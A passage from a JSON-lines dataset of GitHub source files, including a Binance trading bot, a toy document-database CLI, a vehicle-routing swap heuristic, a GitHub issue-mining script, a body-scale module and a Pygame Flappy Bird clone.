'sell') # place Sell Order\n\n if is_order_placed is not None:\n is_bought = False\n value = (close_price - last_bought_price)\n profit += value\n\n if print_action:\n print_and_log(f\"\"\"sell {close_price}, Min Qty: {min_qty}, Profit: {profit} \"\"\")\n # print(\"Sell\", close_price, \"Min Qty:\", min_qty, \"Profit: \", profit)\n else:\n if print_action:\n print_and_log(f\"\"\"sell order failed {close_price}, Min Qty: {min_qty} \"\"\")\n # print(\"sell order failed\",close_price, \"Min Qty:\", min_qty)\n\n else:\n if print_action:\n print_and_log(f\"\"\"not enough money to buy Min QTY: {min_qty}, {asset_1}: {asset_2_cash} \"\"\")\n # print(\"not enough cash to sell\")\n\n return profit, is_bought, last_max_value, last_bought_price\n\n\ndef run(symbol, asset_1, asset_2, interval='1m',\n sma_short=5, sma_long=20, ema_short=5, ema_long=20, rsi_period=14,\n stop_loss=0.001, take_profit=0.2, print_action=True, is_bought=False,\n profit=0, last_bought_price=-1, last_max_value=-1, multiplier=1, ):\n\n limit = sma_long if sma_long > ema_long else ema_long\n\n df = get_data(symbol, interval, sma_short=sma_short, sma_long=sma_long, ema_short=ema_short, ema_long=ema_long,\n rsi_period=rsi_period)[-limit:]\n\n\n # is_load = True\n # path = 'qtable.csv'\n # env = StockTradingEnv(df, possible_values, action_space, signal_column, is_load, path)\n\n\n last_open_time = df.index[-1]\n while True:\n df = get_data(symbol, interval, sma_short=sma_short, sma_long=sma_long, ema_short=ema_short, ema_long=ema_long,\n rsi_period=rsi_period)[-1:]\n\n if df.index[-1] > last_open_time:\n last_open_time = df.index[-1]\n close_price = df.close[-1]\n profit, is_bought, last_max_value, last_bought_price = bot_binance_signel(df, symbol, asset_1, asset_2, stop_loss,\n take_profit, print_action, is_bought,\n profit, last_bought_price,\n last_max_value, multiplier=multiplier)\n\n print_and_log(f\"\"\"price: {close_price}, profit: {profit}, {asset_1}: {get_cash(asset_1)}, {asset_2}: {get_cash(asset_1)}, DateTime: {last_open_time}\"\"\")\n\n time.sleep(5)\n\ndef print_and_log(message):\n print(message)\n logging.info(message)\n\n\ndef plot_order_stocks(df, symbol, fig):\n fig = go.Figure()\n order_df = pd.DataFrame(client.get_all_orders(symbol=symbol, limit=15))\n order_df['time'] = pd.to_datetime(order_df['time'], unit='ms')\n order_df['updateTime'] = pd.to_datetime(order_df['updateTime'], unit='ms')\n order_df['price_'] = np.float64(order_df.cummulativeQuoteQty) / np.float64(order_df.origQty)\n buy_orders = order_df[order_df.side == 'BUY']\n sell_orders = order_df[order_df.side == 'SELL']\n\n fig.update_traces(go.Scatter(x=df.index, y=df.close, name='Close Price'))\n fig.add_trace(go.Scatter(x=buy_orders.time, y=buy_orders.price_, mode='markers', name='Buy Order'))\n fig.add_trace(go.Scatter(x=sell_orders.time, y=sell_orders.price_, mode='markers', name='Sell Order'))\n\n\ndef main():\n possible_values = [[1, 0], # single_sma(1,0)\n [1, 0], # single_ema\n # [1,0], # single_dmp\n # [-1,1,0], # double_dmp\n [-1, 1, 0], # single_rsi\n # [-1,1,0], # double_ema\n # [-1,1,0], # double_sma\n [0, 1] # is_bought\n ]\n action_space = [-1, 1, 0]\n # signal_column = ['single_sma','single_ema', 'single_dmp', 'double_dmp', 'single_rsi', 'double_ema', 'double_sma']\n signal_column = ['single_sma', 'single_ema', 'single_rsi']\n\n\n stop_loss = 1e-2\n take_profit = 3e-3\n multiplier = 1\n Target = \"BTC\"\n Base_Currency = \"USDT\"\n symbol = Target + Base_Currency\n # current_balance = {'TRX': get_cash('TRX'), 'USDT': get_cash('USDT')}\n current_balance = {Target: get_cash(Target), Base_Currency: get_cash(Base_Currency)}\n print(current_balance)\n\n\n run(symbol=symbol, asset_1=Target, asset_2=Base_Currency, stop_loss=stop_loss,\n take_profit=take_profit,multiplier=multiplier,env=env, is_load=is_load)\n\n\n\n # df = get_data('TRXUSDT', '1m', limit=1000)\n # fig = go.Figure()\n # # plot_order_stocks(df, 'TRXUSDT')\n # for i in range(10):\n # plot_order_stocks(df, 'TRXUSDT',fig)\n # time.sleep(2)\n # fig.show()\n\n\n\n\nif __name__ == '__main__':\n logging.basicConfig(filename='logs.log', format='%(filename)s: %(message)s',level=logging.INFO)\n # get_klines('TRXUSDT', '1m', '4 day ago UTC', 'now UTC')\n main()\n","repo_name":"UMEGS/trading_bot","sub_path":"BinanceBot/bot_functional.py","file_name":"bot_functional.py","file_ext":"py","file_size_in_byte":17579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17181944073","text":"import os\nfrom accepted_formats import video_formats, extracted_data\n\n\npath = '/home/amit9021/AgadoDB/data'\n\n\nfor dirpath, dirnames, filenames in os.walk(path):\n for file in filenames:\n if not any(file.endswith(f\"{i}\") for i in video_formats) and not any(file.startswith(f\"{x}\") for x in extracted_data):\n print(file)\n","repo_name":"amit9021/datamanegment","sub_path":"datamangment/garbage_collector.py","file_name":"garbage_collector.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23856737818","text":"\"\"\"\nThis file will handle hosting the command line tool.\n\"\"\"\nimport sys\nsys.path.append('./')\nsys.path.append('../')\n# sys.path.append('../../')\nfrom cmd import Cmd\nimport re\nimport os\nimport ast\nimport json\nfrom memory import DatabaseStorage\nfrom queries.queryhandler import QueryHandler\nfrom crud.insert import Insert\nfrom crud.update import Update\nfrom crud.delete import Delete\nfrom indexing.text_search import TextSearch\nfrom indexing.create_index import CreateIndex\nfrom interface.constants import *\nimport string\nclass CLI(Cmd):\n prompt = '> '\n intro = \"Welcome to DocsDB-I1! Type ? to list commands\"\n db = None\n database_location = None\n present_directory = None\n collections_list = []\n database_list = []\n \n def getDirectoryList(self, path):\n \"\"\"\n Get the list of database directories. This returns all directories \n having JSON files in the current folder. Not the safest mechanism\n as artificial JSON files may also get pulled in, but we will leave \n it as is for now.\n \"\"\"\n directoryList = []\n\n #return nothing if path is a file\n if os.path.isfile(path):\n return []\n\n #add dir to directorylist if it contains .json files\n if len([f for f in os.listdir(path) if f.endswith('.bson') and 'indexes' not in path])>0:\n directoryList.append(path.split('./')[1])\n\n for d in os.listdir(path):\n new_path = os.path.join(path, d)\n if os.path.isdir(new_path):\n directoryList += self.getDirectoryList(new_path)\n\n return directoryList\n def get_databases(self):\n \"\"\"\n Returns the databases present in the current directory.\n \"\"\"\n self.present_directory = './'\n self.database_list = self.getDirectoryList(self.present_directory)\n\n def get_collections(self):\n \"\"\"\n Returns the collections present under the current directory.\n \"\"\"\n self.collections_list = []\n for path in os.listdir(self.database_location):\n self.collections_list.append(path.split('.')[0])\n\n def do_show(self, inp):\n \"\"\"\n Runs the show command. Inp can be either dbs or collections.\n If not, raise an exception\n \"\"\"\n if inp == DBS:\n for db in self.database_list:\n print(f\">>> {db}\")\n elif inp == COLLECTIONS and self.db != None:\n for collection in self.collections_list:\n print(f\">>> {collection}\")\n else:\n print('Invalid command')\n\n def do_use(self, inp):\n \"\"\"\n Changes the current database to the name provided\n \"\"\"\n if inp == '' or inp == None:\n print('Database Name invalid')\n \n self.db = DatabaseStorage(database_name=inp)\n self.database_location = f'./{inp}/'\n self.get_collections()\n self.db_name = inp\n\n print('switched to', inp)\n\n def do_exit(self, inp):\n '''exit the application.'''\n print(\"Bye\")\n return True\n \n def do_db(self, inp):\n '''\n This handles all other standard mongodb inputs\n '''\n self.parser(inp)\n\n\n def extract_sel_proj(self, inp):\n \"\"\"\n Performing paranthesis matching to find the last } matching the first {\n For now assuming [] and () will match on their own.\n \"\"\"\n if inp[0] != '{':\n return INV_SNTX, ''\n lc, rc = 1,0\n for i,c in enumerate(inp[1:]):\n if c == '{':\n lc += 1\n elif c == '}':\n rc += 1\n if rc == lc:\n # found the match\n r1 = inp[:i+2]\n r2 = inp[i+2:]\n r2 = r2[r2.find('{'):]\n return r1, r2\n\n def parser(self, inp):\n \"\"\"\n Parses the input. For each new functionality added, the required class needs to \n be added to the parser.\n \"\"\"\n tokens = inp.split('.')\n if len(tokens) < 3 or tokens[1] not in self.collections_list:\n print('Invalid command')\n else:\n # In all other cases, process\n self.collection_name = tokens[1]\n self.db = DatabaseStorage(database_name=self.db_name, collection_name=self.collection_name)\n # Perform {} matching to extract the select and project parts.\n [oprn, *rest] = list(map(str.strip, re.split('\\(|\\)', tokens[2])))\n if oprn == FIND:\n sel, proj = self.extract_sel_proj(rest[0])\n q = QueryHandler()\n if sel == INV_SNTX:\n print(INV_SNTX)\n else:\n q.handle_query(oprn, [json.loads(sel), json.loads(proj)], self.db.storage)\n # CRUD operations only have 1 field {}\n elif oprn == INSERT_ONE:\n payload = json.loads(rest[0])\n ins = Insert()\n ins.insert_one(database=self.db_name, collection_name=self.collection_name, payload=payload)\n elif oprn == INSERT_MANY:\n payloads = json.loads(rest[0])\n ins = Insert()\n ins.insert_many(database=self.db_name, collection_name=self.collection_name, payloads=payloads)\n elif oprn == UPDATE_ONE:\n payload = json.loads(rest[0])\n up = Update()\n up.update_one(database=self.db_name, collection_name=self.collection_name, payload=payload)\n elif oprn == DELETE_ONE:\n payload = json.loads(rest[0])\n delete = Delete()\n delete.delete_one(database=self.db_name, collection_name=self.collection_name, payload=payload)\n elif oprn == SEARCH:\n # Just a single word\n payload = rest[0][1:-1]\n if type(payload)!= str:\n print(\"Requires a single word to search\")\n else:\n ts = TextSearch(database_name=self.db_name, collection_name=self.collection_name, word_to_search=payload)\n ts.search()\n elif oprn == C_INDX:\n # payload is a list of fields\n try:\n payload = ast.literal_eval(rest[0])\n index = CreateIndex(database_name=self.db_name, collection_name=self.collection_name, fields=payload)\n index.populate_index(SEARCH)\n except:\n print(\"Require a list of fields\")\n elif oprn == LOOKUP:\n lookup_str = rest[0]\n lookup_str.strip(\"()\")\n print(lookup_str)\n lookup_dict = json.loads(lookup_str)\n from_collection = lookup_dict['from']\n local_field = lookup_dict['localField']\n foreign_field = lookup_dict['foreignField']\n as_field = lookup_dict['as']\n type = lookup_dict['type']\n\n col2 = DatabaseStorage(database_name=self.db_name, collection_name=from_collection)\n col1 = DatabaseStorage(database_name=self.db_name, collection_name=self.collection_name)\n\n q = QueryHandler()\n q.handle_query('lookup', [col2.storage, local_field, foreign_field, as_field, type], col1.storage)\n elif oprn == GROUPBY:\n q = QueryHandler()\n groupby, proj = self.extract_sel_proj(rest[0])\n q.handle_query(oprn,[json.loads(groupby),json.loads(proj)], self.db.storage)\n \n # TODO: ADD NEW OPERATIONS HERE.\n\ncli = CLI()\ncli.get_databases()\ncli.cmdloop()\n","repo_name":"lordbeerus0505/DocDbImplementation","sub_path":"interface/cli_runner.py","file_name":"cli_runner.py","file_ext":"py","file_size_in_byte":7709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13668844494","text":"import socket\n\nHOST = '127.0.0.1'\nPORT = 10000\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\n\nwhile True:\n message = input('客户端:')\n s.sendall(message.encode())\n data = s.recv(4096)\n print('服务器:{}'.format(data.decode()))\ns.close()\n\n\n\n","repo_name":"no2key/hellopy","sub_path":"talk_server/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30037599331","text":"from VRP_Model import *\nfrom VRPMinimumInsertions import *\nfrom SolutionDrawer import *\n\nclass Solution:\n def __init__(self): #sider\n self.max_cost_of_route = 0.0\n self.routes = []\n\nclass SwapMove(object):\n def __init__(self):\n self.positionOfFirstRoute = None\n self.positionOfSecondRoute = None\n self.positionOfFirstNode = None\n self.positionOfSecondNode = None\n self.costChangeFirstRt = None\n self.costChangeSecondRt = None\n self.moveCost = None\n\n def Initialize(self):\n self.positionOfFirstRoute = None\n self.positionOfSecondRoute = None\n self.positionOfFirstNode = None\n self.positionOfSecondNode = None\n self.costChangeFirstRt = None\n self.costChangeSecondRt = None\n self.moveCost = 10 ** 9\n\nclass Swaps:\n\n def __init__(self, minIns):\n # m is the model, siders_constant, siders_constant2 (the second is optional) are numbers that define how\n # important is it for an insertion not to increase the min_max cost of the solution\n self.allNodes = minIns.allNodes\n self.customers = minIns.customers\n self.depot = minIns.allNodes[0]\n self.time_matrix = minIns.time_matrix\n self.capacity = minIns.capacity\n self.sol = minIns.sol\n self.bestSolution = None\n\n def solveSwaps(self): # with sort variable defines if the minimum_insertions_with_opened_routes will\n # sort the self.customers\n self.LocalSearch(1)\n return self.sol\n\n def FindRouteWithMaxCost(self): # mo\n # function returning the route with the maximum cost and its index in the list of routes\n for i in range(len(self.sol.routes)):\n if self.sol.routes[i].cost == self.sol.max_cost_of_route:\n print(i)\n return (i,self.sol.routes[i])\n # return [(i,self.sol.routes[i]) if self.sol.routes[i].cost == self.sol.max_cost_of_route else None for i in range(len(self.sol.routes))]\n\n def CalculateMaxCostOfRoute(self): # sider\n # returns the max cost of the routes in the current solution\n # return max(\n # sum(\n # self.time_matrix[self.sol.routes[i].sequenceOfNodes[j].ID][self.sol.routes[i].sequenceOfNodes[j + 1].ID]\n # for j in range(len(self.sol.routes[i].sequenceOfNodes) - 1)\n # ) for i in range(len(self.sol.routes))\n # )\n return max(route.cost for route in self.sol.routes) # if the routes costs are correct this will work, else\n # try the commented piece of code\n\n def LocalSearch(self, operator):\n self.bestSolution = self.cloneSolution(self.sol)\n terminationCondition = False\n localSearchIterator = 0\n\n sm = SwapMove()\n\n while terminationCondition is False:\n\n self.InitializeOperators(sm)\n #SolDrawer.draw(localSearchIterator, self.sol, self.allNodes)\n\n # Swaps\n if operator == 1:\n self.FindBestSwapMove(sm)\n if sm.positionOfFirstRoute is not None:\n if sm.moveCost < 0:\n self.ApplySwapMove(sm)\n else:\n terminationCondition = True\n\n self.TestSolution()\n\n if (self.sol.max_cost_of_route < self.bestSolution.max_cost_of_route):\n self.bestSolution = self.cloneSolution(self.sol)\n\n localSearchIterator = localSearchIterator + 1\n\n self.sol = self.bestSolution\n print(localSearchIterator)\n\n def FindBestSwapMove(self, sm): # mo\n unpack = self.FindRouteWithMaxCost() # find the Route with the max cost and its index in the routes matrix\n firstRouteIndex = unpack[0] # unpack index\n rt1 = unpack[1] # unpack Route\n for secondRouteIndex in range(0, len(self.sol.routes)): # for every route that has not been checked for the first root\n rt2: Route = self.sol.routes[secondRouteIndex] # the route from which a node will be swapped\n for firstNodeIndex in range(1, len(rt1.sequenceOfNodes) - 1): # for every node of the first route\n startOfSecondNodeIndex = 1 # start index for the second route\n if rt1 == rt2: #if the routes are the same\n startOfSecondNodeIndex = firstNodeIndex + 1 # start one node forward to avoid checking the same ones\n for secondNodeIndex in range(startOfSecondNodeIndex, len(rt2.sequenceOfNodes) - 1): # for every node of the second route after the index we specified\n\n # nodes of the first route\n a1 = rt1.sequenceOfNodes[firstNodeIndex - 1]\n b1 = rt1.sequenceOfNodes[firstNodeIndex]\n c1 = rt1.sequenceOfNodes[firstNodeIndex + 1]\n\n # nodes of the second route\n a2 = rt2.sequenceOfNodes[secondNodeIndex - 1]\n b2 = rt2.sequenceOfNodes[secondNodeIndex]\n c2 = rt2.sequenceOfNodes[secondNodeIndex + 1]\n\n moveCost = None\n costChangeFirstRoute = None\n costChangeSecondRoute = None\n\n if rt1 == rt2: # if the routes are same\n if firstNodeIndex == secondNodeIndex - 1: # if the first node is behind the second node\n costRemoved = self.time_matrix[a1.ID][b1.ID] + self.time_matrix[b1.ID][b2.ID] + \\\n self.time_matrix[b2.ID][c2.ID]\n costAdded = self.time_matrix[a1.ID][b2.ID] + self.time_matrix[b2.ID][b1.ID] + \\\n self.time_matrix[b1.ID][c2.ID]\n moveCost = costAdded - costRemoved\n\n else:\n costRemoved1 = self.time_matrix[a1.ID][b1.ID] + self.time_matrix[b1.ID][c1.ID]\n costAdded1 = self.time_matrix[a1.ID][b2.ID] + self.time_matrix[b2.ID][c1.ID]\n costRemoved2 = self.time_matrix[a2.ID][b2.ID] + self.time_matrix[b2.ID][c2.ID]\n costAdded2 = self.time_matrix[a2.ID][b1.ID] + self.time_matrix[b1.ID][c2.ID]\n moveCost = costAdded1 + costAdded2 - (costRemoved1 + costRemoved2)\n else:\n if rt1.load - b1.demand + b2.demand > self.capacity:\n continue\n if rt2.load - b2.demand + b1.demand > self.capacity:\n continue\n\n costRemoved1 = self.time_matrix[a1.ID][b1.ID] + self.time_matrix[b1.ID][c1.ID]\n costAdded1 = self.time_matrix[a1.ID][b2.ID] + self.time_matrix[b2.ID][c1.ID]\n costRemoved2 = self.time_matrix[a2.ID][b2.ID] + self.time_matrix[b2.ID][c2.ID]\n costAdded2 = self.time_matrix[a2.ID][b1.ID] + self.time_matrix[b1.ID][c2.ID]\n\n costChangeFirstRoute = costAdded1 - costRemoved1\n costChangeSecondRoute = costAdded2 - costRemoved2\n if (rt1.cost + costChangeFirstRoute) > (rt2.cost + costChangeSecondRoute):\n moveCost = costChangeFirstRoute\n else:\n moveCost = rt2.cost + costChangeSecondRoute - self.sol.max_cost_of_route\n if moveCost < sm.moveCost and abs(moveCost) > 0.0001:\n self.StoreBestSwapMove(firstRouteIndex, secondRouteIndex, firstNodeIndex, secondNodeIndex,\n moveCost, costChangeFirstRoute, costChangeSecondRoute, sm)\n\n\n def ApplySwapMove(self, sm):\n rt1 = self.sol.routes[sm.positionOfFirstRoute]\n rt2 = self.sol.routes[sm.positionOfSecondRoute]\n b1 = rt1.sequenceOfNodes[sm.positionOfFirstNode]\n b2 = rt2.sequenceOfNodes[sm.positionOfSecondNode]\n rt1.sequenceOfNodes[sm.positionOfFirstNode] = b2\n rt2.sequenceOfNodes[sm.positionOfSecondNode] = b1\n\n if (rt1 == rt2):\n rt1.cost += sm.moveCost\n else:\n rt1.cost += sm.costChangeFirstRt\n rt2.cost += sm.costChangeSecondRt\n rt1.load = rt1.load - b1.demand + b2.demand\n rt2.load = rt2.load + b1.demand - b2.demand\n\n self.sol.max_cost_of_route = self.CalculateMaxCostOfRoute() # find the new max cost after the relocation\n self.TestSolution()\n\n\n def StoreBestSwapMove(self, firstRouteIndex, secondRouteIndex, firstNodeIndex, secondNodeIndex, moveCost,\n costChangeFirstRoute, costChangeSecondRoute, sm):\n sm.positionOfFirstRoute = firstRouteIndex\n sm.positionOfSecondRoute = secondRouteIndex\n sm.positionOfFirstNode = firstNodeIndex\n sm.positionOfSecondNode = secondNodeIndex\n sm.costChangeFirstRt = costChangeFirstRoute\n sm.costChangeSecondRt = costChangeSecondRoute\n sm.moveCost = moveCost\n\n def cloneRoute(self, rt: Route):\n cloned = Route(self.depot, self.capacity)\n cloned.cost = rt.cost\n cloned.load = rt.load\n cloned.sequenceOfNodes = rt.sequenceOfNodes.copy()\n return cloned\n\n def cloneSolution(self, sol: Solution):\n cloned = Solution()\n for i in range(0, len(sol.routes)):\n rt = sol.routes[i]\n clonedRoute = self.cloneRoute(rt)\n cloned.routes.append(clonedRoute)\n cloned.max_cost_of_route = self.sol.max_cost_of_route\n return cloned\n\n def InitializeOperators(self, sm):\n sm.Initialize()\n\n def TestSolution(self): # sider\n if len(self.sol.routes) > 25: # if the solution used more routes than the routes available\n print(\"Routes' number problem.\")\n max_cost_of_route = 0\n nodes_serviced = 0\n for r in range(0, len(self.sol.routes)):\n rt: Route = self.sol.routes[r]\n nodes_serviced += len(rt.sequenceOfNodes) - 2 # -2 because we remove depot that exist twice in every route\n rt_cost = 0\n rt_load = 0\n for n in range(0, len(rt.sequenceOfNodes) - 1):\n A = rt.sequenceOfNodes[n]\n B = rt.sequenceOfNodes[n + 1]\n rt_cost += self.time_matrix[A.ID][B.ID]\n rt_load += A.demand\n if abs(rt_cost - rt.cost) > 0.0001:\n print('Route Cost problem')\n if rt_load != rt.load:\n print('Route Load problem')\n if rt_cost > max_cost_of_route:\n max_cost_of_route = rt_cost\n if abs(max_cost_of_route - self.sol.max_cost_of_route) > 0.0001:\n print('Solution Cost problem, solution cost: ' + str(self.sol.max_cost_of_route) +\n ' calculated cost: ' + str(self.CalculateMaxCostOfRoute()))\n if nodes_serviced != len(self.customers):\n print('Number of serviced nodes problem')\n","repo_name":"Nikos-Antonopoulos/MEVEDE-COMPETITION","sub_path":"Swaps.py","file_name":"Swaps.py","file_ext":"py","file_size_in_byte":11071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"69996038655","text":"\"\"\"Body scale module.\"\"\"\nfrom functools import cached_property\n\nfrom ..models import Gender\n\n\nclass Scale:\n \"\"\"Scale implementation.\"\"\"\n\n def __init__(self, height: int, gender: Gender):\n self._height = height\n self._gender = gender\n\n def get_fat_percentage(self, age: int) -> list[float]:\n \"\"\"Get fat percentage.\"\"\"\n\n # The included tables where quite strange, maybe bogus, replaced them with better ones...\n scales: list[dict] = [\n {\n \"min\": 0,\n \"max\": 12,\n Gender.FEMALE: [12.0, 21.0, 30.0, 34.0],\n Gender.MALE: [7.0, 16.0, 25.0, 30.0],\n },\n {\n \"min\": 12,\n \"max\": 14,\n Gender.FEMALE: [15.0, 24.0, 33.0, 37.0],\n Gender.MALE: [7.0, 16.0, 25.0, 30.0],\n },\n {\n \"min\": 14,\n \"max\": 16,\n Gender.FEMALE: [18.0, 27.0, 36.0, 40.0],\n Gender.MALE: [7.0, 16.0, 25.0, 30.0],\n },\n {\n \"min\": 16,\n \"max\": 18,\n Gender.FEMALE: [20.0, 28.0, 37.0, 41.0],\n Gender.MALE: [7.0, 16.0, 25.0, 30.0],\n },\n {\n \"min\": 18,\n \"max\": 40,\n Gender.FEMALE: [21.0, 28.0, 35.0, 40.0],\n Gender.MALE: [11.0, 17.0, 22.0, 27.0],\n },\n {\n \"min\": 40,\n \"max\": 60,\n Gender.FEMALE: [22.0, 29.0, 36.0, 41.0],\n Gender.MALE: [12.0, 18.0, 23.0, 28.0],\n },\n {\n \"min\": 60,\n \"max\": 100,\n Gender.FEMALE: [23.0, 30.0, 37.0, 42.0],\n Gender.MALE: [14.0, 20.0, 25.0, 30.0],\n },\n ]\n\n for scale in scales:\n if scale[\"min\"] <= age < scale[\"max\"]:\n return scale[self._gender] # type: ignore\n\n # will never happen but mypy required it\n raise NotImplementedError\n\n @cached_property\n def muscle_mass(self) -> list[float]:\n \"\"\"Get muscle mass.\"\"\"\n scales: list[dict] = [\n {\n \"min\": {Gender.MALE: 170, Gender.FEMALE: 160},\n Gender.FEMALE: [36.5, 42.6],\n Gender.MALE: [49.4, 59.5],\n },\n {\n \"min\": {Gender.MALE: 160, Gender.FEMALE: 150},\n Gender.FEMALE: [32.9, 37.6],\n Gender.MALE: [44.0, 52.5],\n },\n {\n \"min\": {Gender.MALE: 0, Gender.FEMALE: 0},\n Gender.FEMALE: [29.1, 34.8],\n Gender.MALE: [38.5, 46.6],\n },\n ]\n\n for scale in scales:\n if self._height >= scale[\"min\"][self._gender]:\n return scale[self._gender] # type: ignore\n\n # will never happen but mypy required it\n raise NotImplementedError\n","repo_name":"dckiller51/bodymiscale","sub_path":"custom_components/bodymiscale/metrics/scale.py","file_name":"scale.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"79"} +{"seq_id":"25458485028","text":"from config import *\nfrom datetime import datetime\nfrom github import Github\nfrom helper import _get_time, _mine_convers, _check_quota, _get_bots\nimport math\nimport statistics\nimport pandas as pd\n\nbots = _get_bots()\n\n\ndef _compare():\n global TOKEN_ID\n g = Github(TOKENS[TOKEN_ID])\n # only compare data from the last month\n last_month = _get_time(1)\n current = _get_time(0)\n\n num_active_authors = []\n num_issue_closed = []\n num_pr_closed = []\n avg_time_issue = []\n avg_time_pr = []\n\n for proj in COMP_PROJS:\n issues = []\n prs = []\n\n print(proj)\n try:\n repo = g.get_repo(proj)\n except:\n g, repo = _check_quota(g, repo)\n repo = g.get_repo(proj)\n\n # get issues/prs from the past half a year\n try:\n res = repo.get_issues(\n state=\"all\", \n since=_get_time(6),\n direction=\"desc\")\n except:\n [g, repo] = _check_quota(g, repo)\n res = repo.get_issues(\n state=\"all\", \n since=_get_time(6),\n direction=\"desc\")\n \n count = 0\n for ind in res:\n count += 1\n if count % 500 == 0:\n g, repo = _check_quota(g, repo)\n\n num = ind.number\n try:\n ind_res = repo.get_issue(number=num)\n except:\n g, repo = _check_quota(g, repo)\n ind_res = repo.get_issue(number=num)\n\n # if it's closed before the past month, we don't need to care about it\n # all left are the ones that are still open or closed within the past\n # month\n if (ind_res.closed_at != None and ind_res.closed_at < last_month):\n break\n\n if ind_res.closed_at != None: \n close_len = (ind_res.closed_at - ind_res.created_at).days\n open_for = close_len\n else:\n close_len = -1\n open_for = (datetime.today() - ind_res.created_at).days\n\n cur_dict = {\n \"number\":num,\n \"title\": ind_res.title,\n \"url\": ind_res.html_url,\n \"author\": ind_res.user,\n \"created_at\":ind_res.created_at,\n \"closed_at\":ind_res.closed_at,\n \"merged_at\": None,\n \"state\":ind_res.state,\n \"close_len\": close_len,\n \"open_for\": open_for,\n \"num_comments\":ind_res.comments,\n \"label\":[ind.name for ind in ind_res.labels]\n }\n\n # a pull request has a not none pull_request field\n g, repo = _check_quota(g, repo)\n if ind_res.pull_request != None:\n prs.append(cur_dict)\n else:\n issues.append(cur_dict)\n\n issues = pd.DataFrame(issues)\n prs = pd.DataFrame(prs)\n # num active authors\n non_bot_authors_i = [author for author in issues[\"author\"].tolist() if author not in bots]\n non_bot_authors_p = [author for author in prs[\"author\"].tolist() if author not in bots]\n num_active_authors.append(len(list(set(non_bot_authors_i).union(set(non_bot_authors_p)))))\n \n # num issue closed\n cur_win_closed_i = issues.loc[\n (issues[\"state\"]!=\"open\") &\n (issues[\"closed_at\"]>=last_month) &\n (issues[\"closed_at\"]=last_month) &\n (prs[\"closed_at\"]= 550:\n man_hinh.blit(be_mat_ong_tao_ra,pipe)\n else:\n flip_pipe = pygame.transform.flip(be_mat_ong_tao_ra,False,True) \n #Làm cho ống nó lật ngược lại\n man_hinh.blit(flip_pipe,pipe)\n#Hàm xử lý va chạm\ndef kiem_tra_va_cham(pipes):\n for pipe in pipes :\n if doi_hinh_chu_nhat.colliderect(pipe):\n am_thanh_va_cham.play()\n return False\n if doi_hinh_chu_nhat.top < 30 or doi_hinh_chu_nhat.bottom >= 810:\n return False\n return True\n\ndef xoay_doi_tuong(bat1):\n new_bat = pygame.transform.rotozoom(bat1,di_chuyen_cua_doi*2,1)\n return new_bat\n#hàm xử lý khi đang bay hình ảnh chú chim \ndef hoat_anh_cua_doi():\n new_bat = danh_sach_doi[gia_tri_cua_doi]\n new_doi_hinh_chu_nhat = new_bat.get_rect(center = (100, doi_hinh_chu_nhat.centery))\n return new_doi_hinh_chu_nhat\n#Hàm in điểm ra màn hình\ndef hien_thi_diem(game_state):\n if game_state == 'main game':\n diem_surface = font_chu_cua_tro_choi.render(str(int(diem)),True,(110,255,250))\n diem_rect = diem_surface.get_rect(center = (216,100))\n man_hinh.blit(diem_surface,diem_rect)\n if game_state == 'game_over':\n diem_surface = font_chu_cua_tro_choi.render(f'Score: {int(diem)}',True,(110,255,250))\n diem_rect = diem_surface.get_rect(center = (216,100))\n man_hinh.blit(diem_surface,diem_rect)\n\n diem_cao_surface = font_chu_cua_tro_choi.render(f'High Score: {int(diem_cao)}',True, (255,255,255))\n diem_cao_rect = diem_cao_surface.get_rect(center = (216,630))\n man_hinh.blit(diem_cao_surface,diem_cao_rect)\n#hàm cập nhật điểm\ndef cap_nhat_diem_hien_tai(diem,diem_cao):\n if diem > diem_cao:\n diem_cao = diem\n return diem_cao \n\n#Đây là phần xư lý âm thanh cho các file .wav\npygame.mixer.pre_init(frequency=44100,size=16,channels=2,buffer=512)\n\npygame.init()\npygame.display.set_caption(\"Flappy bat\")\nman_hinh = pygame.display.set_mode((432,810))\nclock = pygame.time.Clock()\nfont_chu_cua_tro_choi = pygame.font.Font(\"04B_19.ttf\",45)\n\n\n# Biến\ndo_roi = 0.7 #Độ rơi\ndi_chuyen_cua_doi = -10 #\nhoat_dong_cua_tro_choi = True \ndiem = 0 #Điểm\ndiem_cao = 0 #Điểm cao\n#chèn hinh_nen_game\nhinh_nen_game = pygame.image.load(\"assets/background-cyperpunk.png\").convert()\nhinh_nen_game = pygame.transform.scale2x(hinh_nen_game)\n#chèn sàn\nsan = pygame.image.load(\"assets/floor.png\").convert()\nsan = pygame.transform.scale2x(san)\nsan_x_pos = 0 \n#Tạo chim\ndoi_xuong = pygame.transform.scale2x(pygame.image.load(\"assets/bat2.png\")).convert_alpha()\ndoi_can_bang = pygame.transform.scale2x(pygame.image.load(\"assets/bat2.png\")).convert_alpha()\ndoi_len= pygame.transform.scale2x(pygame.image.load(\"assets/bat2.png\")).convert_alpha()\n# bat = pygame.transform.scale2x(pygame.image.load(\"assets/sea_horse.png\")).convert_alpha\ndanh_sach_doi = [doi_xuong,doi_can_bang,doi_len] \ngia_tri_cua_doi = 0\nbat = danh_sach_doi[gia_tri_cua_doi]\n\n# Tạo timer cho bat \ndoi_bay = pygame.USEREVENT + 1 \npygame.time.set_timer(doi_bay,250)\ndoi_hinh_chu_nhat = bat.get_rect(center=(100,380))\n#bat = pygame.image.load(\"assets/images/bluebat-midflap.png\").convert_alpha()\n#bat = pygame.transform.scale2x(bat)\n# Tạo ống\nbe_mat_ong_tao_ra = pygame.image.load(\"assets/pipe-gray.png\").convert()\nbe_mat_ong_tao_ra = pygame.transform.scale2x(be_mat_ong_tao_ra)\ndanh_sach_ong = [] \n# tạo timer\nsinh_ra_ong = pygame.USEREVENT # bien sinh_ra_ong tao thoi gian spawn ong\npygame.time.set_timer(sinh_ra_ong, 1200)\n#chieu cao 